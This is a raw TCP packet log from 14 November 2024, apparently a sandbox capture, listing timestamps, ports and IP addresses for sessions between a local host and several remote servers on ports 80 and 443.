Nov 14, 2024 08:08:19.704392910 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704400063 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704404116 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.704437017 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.704502106 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.704715967 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704814911 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704828024 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.704855919 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.709139109 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709158897 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709188938 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709249020 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.709415913 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709430933 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709472895 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.709538937 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709604979 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709645033 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.709662914 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709774971 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709786892 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.709810972 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.709940910 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.710511923 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.710551977 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.821162939 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821181059 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821212053 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821222067 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821232080 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821250916 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821300030 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.821329117 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.821583986 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821605921 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821614981 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.821666956 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.825853109 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.825894117 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.825900078 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.825933933 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.825952053 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.825962067 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.825989962 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.826028109 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.826133966 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826141119 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826149940 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826190948 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.826746941 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826806068 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826854944 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826886892 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.826910019 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.826952934 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826957941 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.826999903 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.827070951 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.877214909 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.938445091 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.938467979 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.938482046 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.938571930 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.938668013 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.938673973 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.938687086 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.938734055 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.938971996 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.939091921 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.939100981 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.939143896 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.942790985 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.942909002 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.942919016 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.942949057 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.942994118 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.943018913 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.943025112 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.943036079 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.943042040 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.943073034 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.943099022 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.943451881 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944031000 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944063902 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944188118 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.944192886 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944205046 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944247007 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:19.944268942 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944358110 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:19.944397926 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.057404995 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057434082 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057442904 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057452917 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057459116 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057466030 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057477951 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057485104 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.057523966 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.057565928 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.060662031 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.060838938 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.060858965 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.060893059 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.060920954 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.060944080 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.060987949 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061019897 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061065912 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.061153889 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061328888 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061364889 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061378002 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.061486959 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061506033 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061539888 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.061661005 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061698914 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061711073 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.061794996 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.061845064 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.101907969 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.102035046 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.102044106 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.102222919 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.172076941 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172118902 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172130108 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172204018 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172277927 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.172307014 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.172318935 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172334909 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172415018 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.172467947 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172569036 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172580004 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.172621012 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.176383018 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176474094 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176485062 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176491022 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.176543951 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.176615953 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176629066 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176690102 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.176748991 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176843882 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176882982 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.176966906 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.176979065 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.177026987 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.180187941 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.180273056 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.180280924 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.180329084 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.180449009 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.180463076 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.180490017 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.217747927 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.217780113 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.217824936 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.217920065 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.217920065 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.218036890 CET	80	49704	147.45.44.131	192.168.2.5
Nov 14, 2024 08:08:20.261970043 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.793016911 CET	49704	80	192.168.2.5	147.45.44.131
Nov 14, 2024 08:08:20.904618025 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:20.904674053 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:20.904757977 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:20.906173944 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:20.906198025 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:21.526171923 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:21.526629925 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:21.530520916 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:21.530531883 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:21.530910969 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:21.580302954 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:21.594183922 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:21.594208956 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:21.594667912 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:22.073875904 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:22.074126959 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:22.074198008 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:22.075874090 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:22.075896978 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:22.075911045 CET	49705	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:22.075917959 CET	443	49705	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:22.376833916 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:22.376868963 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:22.376929998 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:22.391619921 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:22.391638994 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.248636007 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.248794079 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.251542091 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.251553059 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.251837969 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.253247023 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.295327902 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.854532003 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.854552984 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.854604959 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.854628086 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.854641914 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.854690075 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.867844105 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.867918968 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.867929935 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.867952108 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.867981911 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.868004084 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.973007917 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.973184109 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.973232985 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.973345995 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.973359108 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.973448992 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.973501921 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.973587036 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.973598957 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:23.973611116 CET	49706	443	192.168.2.5	104.102.49.254
Nov 14, 2024 08:08:23.973615885 CET	443	49706	104.102.49.254	192.168.2.5
Nov 14, 2024 08:08:24.144107103 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.144155979 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:24.144265890 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.144640923 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.144653082 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:24.766604900 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:24.766719103 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.768413067 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.768429995 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:24.768738031 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:24.770838022 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.770867109 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:24.770917892 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:25.512994051 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:25.513088942 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:25.513279915 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:25.513406038 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:25.513406038 CET	49707	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:25.513425112 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:25.513437033 CET	443	49707	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:25.557048082 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:25.557099104 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:25.557208061 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:25.557533026 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:25.557543993 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.182497978 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.182744026 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.184101105 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.184124947 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.184374094 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.185797930 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.185797930 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.185895920 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697221041 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697419882 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697508097 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697594881 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.697598934 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697678089 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697737932 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.697844982 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.697910070 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.697926044 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.752613068 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.752645969 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.799242973 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.842643976 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.842885971 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.842974901 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.842974901 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.843013048 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.843070030 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.843075991 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.843379974 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.843542099 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.843626976 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.843626976 CET	49708	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.843647003 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.843657017 CET	443	49708	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.866583109 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.866631031 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:26.866703033 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.867011070 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:26.867031097 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:27.485399961 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:27.485558987 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:27.487282038 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:27.487298012 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:27.488274097 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:27.489535093 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:27.489682913 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:27.489778996 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.032044888 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.032260895 CET	443	49709	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.032301903 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.032346964 CET	49709	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.048449993 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.048506021 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.048778057 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.049020052 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.049032927 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.660685062 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.661336899 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.662235022 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.662249088 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.662581921 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.664470911 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.664599895 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.664633989 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:28.664853096 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:28.707334995 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:29.329701900 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:29.329958916 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:29.330102921 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:29.330332994 CET	49710	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:29.330353975 CET	443	49710	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:29.425932884 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:29.426013947 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:29.426103115 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:29.426424980 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:29.426440954 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.074800014 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.074954033 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.082596064 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.082623959 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.082937002 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.084526062 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.084705114 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.084743977 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.084810972 CET	49711	443	192.168.2.5	188.114.96.3
Nov 14, 2024 08:08:30.084827900 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.606743097 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.607028961 CET	443	49711	188.114.96.3	192.168.2.5
Nov 14, 2024 08:08:30.607126951 CET	49711	443	192.168.2.5	188.114.96.3
